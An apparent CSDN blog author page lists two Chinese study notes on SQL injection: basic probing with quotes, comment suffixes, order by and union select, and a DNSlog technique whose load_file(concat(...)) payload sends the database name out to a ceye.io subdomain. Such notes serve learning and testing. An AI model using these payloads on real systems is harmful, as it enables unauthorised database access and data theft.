![](https://img-blog.csdnimg.cn/20201014180756738.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
sql注入
sakulaaaaaaa
这个作者很懒,什么都没留下…
展开
-
学习 sql注入的小结
基础在?id= 后面加’ 或 " 或 and1=1 and1=2字符型报错了,加 --+或)–+或))–+等 使它显示正确,要注意的是:如果代码是select * from 。。。where id=($id) 时没有报错时和数字型注入的情况一样,有报错的话就容易更判断,没有就再试试显示报错且显示出列的情况下:二分法order by 显示列数union select 列数 ; 在显...原创 2019-05-07 13:28:08 · 201 阅读 · 2 评论 -
dnslog的sql注入
前两天看到了一个骚姿势,没有回显的时候利用dnslog来得到数据库名等。可以在一个网站上注册ceye.io,注册就可以得到一个二级域名。用到了load_file() ,用法是load_file(文件名),比如这样:select load_file(concat(’\\’,database(),’.xxxx.ceye.io\fwafw’)); 这个就相当于访问了table_schema.xxx...原创 2019-07-09 23:57:38 · 227 阅读 · 0 评论